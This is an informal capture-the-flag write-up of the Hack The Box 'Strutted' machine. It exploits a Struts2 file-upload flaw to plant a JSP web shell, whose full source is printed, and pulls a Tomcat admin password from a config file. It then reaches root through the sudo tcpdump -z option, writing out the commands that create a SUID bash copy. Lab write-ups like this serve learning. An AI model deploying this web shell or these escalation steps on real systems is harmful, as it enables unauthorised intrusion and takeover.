Strutted-HTB MACHINE

RECON

RUST SCAN && NMAP

rustscan -a 10.10.11.59 --ulimit=5000 --range 1-65000 -- -sCV -Pn

nmap -sC -sV -vv -oA 1 10.10.11.59

recon && analysis on website !!!

i was just roaming on the website reading source code , i saw download.action(after reading on the bottom i got there is a writeen something about there docker stuff that catched my attention and then it was written to download and see the stuff ) and upload.action .........

downloaded the strutted folder and then i saw a dir of strutted wit some files

i visited all the files , as you can see below and i got some creds (happy at the time ;) ) , after that got a version of strut 2 (

under pom.xml i saw the version is preesent and after this i was still on file check >> strutted > src > main > java >org > strutted > htb ;) had a nice read at that files (some database files but had nothing intrest at all there )

wass seeing some hidden endpoints......

thesse are some of the files i had the read (still having that version but i was doing it parllely ) ....

RECON OF VERSION NUMBER AND UPLOADING IMAGE TO GET FOOTHOLD !!

finally after scanning files , gone for to may searches and seriosly visited many links rapid seven (but the version was low around 2 to 2.45 something approx ..............

after search for a particular cve i got some resultes and this was quite nice , as i had a nice read at the code basically what it is doing and all stuff .........

GitHub - EQSTLab/CVE-2024-53677: File upload logic flaw in Apache Struts2 exploitGitHub

THEN I STARTED TO ANALYZE THE REQ FROM THE PROXY , AS THE I WAS NOT GEETING THIS POST IMAGE UPLOAD REQ DIRECTLY FROM INTERCEPT !!!!!!!...........

analyzed that there is a name = 'upload' , instead its Upload , if you try this and add a jsp shell as below the foothold is yours ;) , so the reason i took to upload the png was bit difficult as the png format was encoded and i had uploaded a png image from internet , so , that i was geting a lot of encoded format strings ......

see there are two point fields , composition disposition and after the upload was sucessfull just added it again at the end to make sure my file comes at the normal directory where i shouldnt get errors !!! ,

for example , https://ip/uploades/date_data/filename --> https://ip/file

so putting the file format in ../../file --> ip/file makes visible (you have to test this i will be telling all the failures end of this !!!!!!!........

THE CODE AND JSP FILE AT THE END OF THIS SECTION !!!!

i got a shell there !!!!!!(unix) --> foothold

https://raw.githubusercontent.com/tennc/webshell/refs/heads/master/fuzzdb-webshell/jsp/cmd.jsp

// Some code

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

---

---

GAINING FOOTHOLD && SSH to james ;)

uploading the file from my terminal to unix web shell ,

done some mistakes , like uploaded directly , normally i upload it to /tmp

sended perdfectly !!!!

one more mistake norammly i use 4444 , due to a lot fale attempts idk nothing but at last it worked

had some basic recon on foothold !!!

saw the user james downside !!!!!

nothing nice here !!!

tomcat@strutted:~$ ls conf
Catalina	     jaspic-providers.xml  server.xml
catalina.properties  logging.properties    tomcat-users.xml
context.xml	     policy.d		   web.xml

hehheheh we got some creds here ,

// Some code
  <user username="admin" password="IT14d6SSP81k" roles="manager-gui,admin-gui"/>

cat user.txt

and user is yours !!!!

ROOT............

james@strutted:~$ sudo -l
Matching Defaults entries for james on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User james may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/tcpdump

/usr/sbin/tcpdump NOPASSWD

Tcpdump = Network packet sniffer

tcpdump -z --> does the work of capturing the packet and rotating it and executing the command

so basically captured file >>> roating it and then exec cmd !!!......

and also there is a tcpdump page on GTFObins

tried to get some help here , on google and got in mind that this is not goona work (i was doing something else experiments)

james@strutted:~$ cat > /tmp/getroot.sh << 'EOF'
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod 4755 /tmp/rootbash
EOF
james@strutted:~$ chmod +x /tmp/getroot.sh
sudo tcpdump -ln -i any -w /dev/null -W 1 -G 1 -z /tmp/getroot.sh
tcpdump: data link type LINUX_SLL2
tcpdump: listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
40 packets received by filter
0 packets dropped by kernel
james@strutted:~$ /tmp/rootbash -p
rootbash-5.1$ ls
user.txt
rootbash-5.1$ cat /root/root.txt
cat: /root/root.txt: Permission denied

finally the gtfobin was working one and got root there !!!!!!!

james@strutted:~$ COMMAND='cp /bin/bash /tmp/ashu; chmod 6777 /tmp/ashu'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
8 packets received by filter
0 packets dropped by kernel
james@strutted:~$ /tmp/ashu -p
ashu-5.1# cd root
ashu: cd: root: No such file or directory
ashu-5.1# cd /rooot
ashu: cd: /rooot: No such file or directory
ashu-5.1# cd /root
ashu-5.1# pwd
/root
ashu-5.1# cat root.txt
ef4f1331cc6fa4500b5faff16429bde0

Sudo misconfiguration + Tcpdump -z flag + Root context = Command injection → SUID bash copy → Permanent root shell!!!

i am really improving myself at writting reports as i am not expert , just learning daily , the screenshots above were saved and i hae to arranged it properly at the end of machine so tuff , i have to do it parllely , btw done some parrly at the starting ........ will be improving (am too lzy!)..